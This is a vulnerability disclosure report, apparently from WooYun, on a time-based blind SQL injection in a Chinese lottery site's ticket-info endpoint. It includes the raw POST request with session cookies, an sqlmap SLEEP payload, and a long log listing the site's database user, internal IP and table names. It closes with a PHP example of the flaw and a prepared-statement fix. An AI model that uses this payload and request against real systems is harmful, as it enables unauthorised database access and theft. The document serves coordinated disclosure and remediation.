
Vulnerability summary

Defect ID: wooyun-2015-0155910

Title: POST injection in Touzhu.cn (投注网)

Affected vendor: Touzhu.cn (投注网)

Author: 路人甲 (anonymous submitter)

Submitted: 2015-11-26 09:55

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-26: Details sent to the vendor; awaiting vendor response
2015-11-27: Vendor confirmed; details visible to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

RT (see title)

Detailed description:

http://touzhu.cn/  Touzhu.cn (投注网)


POST /ajaxact/ajax_ticket_info.php HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://touzhu.cn
Cookie: PHPSESSID=0i0d8qv1pcg257g3lmtbsgs3f4; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1448331169,1448331342,1448331468,1448331677; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1448331677; HMACCOUNT=3C51B8E09E24C184; box_wxts=on; bdshare_firstime=1448328867470; BAIDUID=59E436C689FE1279BA502F5E6F4883E0:FG=1
Host: touzhu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
itemid=*


The itemid parameter is injectable (the value marked * in the request above is the injection point).

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: itemid=' AND (SELECT * FROM (SELECT(SLEEP(5)))ROcc) AND 'Lbdo'='Lbdo
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5
current user: 'caiso@192.168.0.55'
current database: 'caiso'
current user is DBA: False
available databases [2]:
[*] caiso
[*] information_schema


Too many tables; the enumeration was not run to completion...

[17:18:35] [INFO] adjusting time delay to 1 second due to good response times
09
[17:18:39] [INFO] retrieved: activity_activities
[17:20:09] [INFO] retrieved: activity_activity_detail
[17:21:06] [INFO] retrieved: activity_cz_jj
[17:21:44] [INFO] retrieved: admin_channel
[17:22:47] [INFO] retrieved: admin_class
[17:23:14] [INFO] retrieved: admin_friendly_link
[17:24:27] [INFO] retrieved: admin_help_center
[17:25:33] [INFO] retrieved: admin_permissions
[17:26:35] [INFO] retrieved: admin_role
[17:27:05] [INFO] retrieved: admin_role_function
[17:28:03] [INFO] retrieved: admin_syslogs
[17:28:47] [INFO] retrieved: admin_user
[17:29:17] [INFO] retrieved: admin_winprize
[17:30:08] [INFO] retrieved: business_article
[17:31:25] [INFO] retrieved: business_article_category
[17:32:24] [INFO] retrieved: business_article_inlink
[17:33:18] [INFO] retrieved: business_back_money_request
[17:34:58] [INFO] retrieved: business_bonus
[17:35:33] [INFO] retrieved: business_chase
[17:36:06] [INFO] retrieved: business_chaseitem
[17:36:48] [INFO] retrieved: business_city_no
[17:37:34] [INFO] retrieved: business_community
[17:38:26] [INFO] retrieved: business_company
[17:39:01] [INFO] retrieved: business_customer
[17:39:49] [INFO] retrieved: business_customer_commission
[17:41:05] [INFO] retrieved: business_ema
[17:41:42] [ERROR] invalid character detected. retrying..
[17:41:42] [WARNING] increasing time delay to 2 seconds
il
[17:42:00] [INFO] retrieved: business_feedback
[17:43:23] [INFO] retrieved: business_filedownlod
[17:45:23] [INFO] retrieved: business_league
[17:46:38] [INFO] retrieved: business_league_rank
[17:48:03] [INFO] retrieved: business_match_arrange
[17:50:24] [INFO] retrieved: business_match_arrange_test
[17:52:10] [INFO] retrieved: business_match_history
[17:53:54] [INFO] retrieved: business_match_mapping
[17:55:42] [INFO] retrieved: business_match_team_mapping
[17:58:10] [INFO] retrieved: business_mobile
[17:59:22] [INFO] retrieved: business_odd
[18:00:11] [INFO] retrieved: business_order
[18:01:10] [INFO] retrieved: business_order_queue
[18:02:40] [INFO] retrieved: business_order_temp
[18:03:57] [INFO] retrieved: business_part
[18:04:55] [INFO] retrieved:
[18:04:57] [INFO] adjusting time delay to 1 second due to good response times
business_partner
[18:05:25] [INFO] retrieved: business_pay
[18:05:42] [INFO] retrieved: business_pay_out_request
[18:07:03] [INFO] retrieved: business_payment_request
[18:08:16] [INFO] retrieved: business_plan
[18:08:42] [INFO] retrieved: business_plan_item
[18:09:21] [INFO] retrieved: business_prize_level
[18:10:24] [INFO] retrieved: business_recharge_gift
[18:11:39] [INFO] retrieved: business_restricted
[18:12:29] [INFO] retrieved: business_sms_log
[18:13:19] [INFO] retrieved: business_sms_mo_log
[18:14:08] [INFO] retrieved: business_sms_partner
[18:14:59] [INFO] retrieved: business_soft_update
[18:16:05] [INFO] retrieved: business_supplier
[18:16:54] [INFO] retrieved: business_system_param
[18:17:57] [INFO] retrieved: business_team
[18:18:28] [INFO] retrieved: business_term
[18:18:52] [INFO] retrieved: business_term_type_config
[18:20:11] [INFO] retrieved: business_ticket
[18:20:44] [INFO] retrieved: business_wallet
[18:21:27] [INFO] retrieved: business_wallet_log
[18:22:07] [INFO] retrieved: business_win_describe_order
[18:23:41] [INFO] retrieved: business_win_describe_ticket
[18:24:39] [INFO] retrieved: business_win_prize
[18:25:21] [INFO] retrieved: business_you_hui_ma
[18:26:23] [INFO] retrieved: copy_cat
[18:27:03] [INFO] retrieved: event_class
[18:28:00] [INFO] retrieved: event_code
[18:28:23] [INFO] retrieved: event_give
[18:28:54] [INFO] retrieved: event_login
[18:29:29] [INFO] retrieved: event_oscar2015
[18:30:14] [INFO] retrieved: event_oscar2015_award
[18:31:01] [INFO] retrieved: event_oscar2015_items
[18:31:44] [INFO] retrieved: event_packet
[18:32:19] [INFO] retrieved: event_packet_class
[18:33:02] [INFO] retrieved: event_pay
[18:33:18] [INFO] retrieved: odds
[18:33:42] [INFO] retrieved: s
[18:33:53] [ERROR] invalid character detected. retrying..
[18:33:53] [WARNING] increasing time delay to 2 seconds
essions
[18:34:57] [INFO] retrieved: sm_queue
[18:36:03] [INFO] retrieved: tz_agent
[18:37:30] [INFO] retrieved: tz_agent_discount
[18:39:21] [INFO] retrieved: tz_agent_invit
[18:40:40] [ERROR] invalid character detected. retrying..
[18:40:40] [WARNING] increasing time delay to 3 seconds
e
[18:40:50] [INFO] retrieved: tz_apppay_temp
[18:43:49] [INFO] retrieved: tz_balance
[18:45:29] [INFO] retrieved: tz_balance_items
[18:47:21] [INFO] retrieved: tz_checkmobile
[18:49:56] [INFO] retrieved: tz_config
[18:51:35] [INFO] retrieved: tz_discou
[18:53:26] [ERROR] invalid character detected. retrying..
[18:53:26] [WARNING] increasing time delay to 4 seconds
nt_plan
[18:56:04] [INFO] retrieved: tz_discount_plan_items
[18:59:06] [INFO] retrieved: tz_event_pay


Proof of vulnerability:

Fix recommendation:

Requesting a high rank
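The report leaves the fix section empty, so the following is an added example, not the touzhu.cn code (which is not on the page) and not the author's: it shows the injectable pattern the finding implies (a POST value interpolated into the SQL text of a PHP/MySQL handler) beside a hardened handler for the same endpoint. The table and column names (business_ticket, itemid, id, status), the connection details and the credentials are assumptions; the sqlmap output lists a business_ticket table, but the real query is not shown.

```php
<?php
// Added example (not the site's own code). Table/column names are assumed.

// --- Vulnerable pattern: the POST value becomes part of the SQL text. ---
// A quoted value in the body is parsed by MySQL as SQL, which is what a
// time-based blind finding like the one in this report relies on.
function ticket_info_vulnerable(mysqli $db, array $post): ?array
{
    $itemid = $post['itemid'] ?? '';
    $sql = "SELECT * FROM business_ticket WHERE itemid = '$itemid'";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened version: validate the type, then bind the value as a parameter. ---
function ticket_info_safe(PDO $db, array $post): ?array
{
    // itemid is an identifier: reject anything that is not a positive integer.
    $itemid = filter_var(
        $post['itemid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($itemid === false) {
        http_response_code(400);
        return null;
    }
    // Prepared statement: the value travels separately from the SQL text and is
    // never parsed as SQL, whatever characters it contains.
    $stmt = $db->prepare('SELECT id, itemid, status FROM business_ticket WHERE itemid = :itemid');
    $stmt->bindValue(':itemid', $itemid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection setup (placeholder host, user and password). Emulated prepares are
// disabled so that MySQL itself performs the parameter binding.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=caiso;charset=utf8mb4', 'app_user', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

header('Content-Type: application/json');
echo json_encode(ticket_info_safe($pdo, $_POST));
```

The integer check is a defence in depth on top of the prepared statement, not a substitute for it; the binding is what removes the injection. The sqlmap output also shows the application account is not a DBA, which limits what an injection can reach; keeping that account restricted to the tables and statements the endpoint needs is the second half of the mitigation.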

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-11-27 11:01

Vendor reply:

Thanks. Much appreciated that you care about our hole; it has already been handed over to the developer.

Latest status:

None yet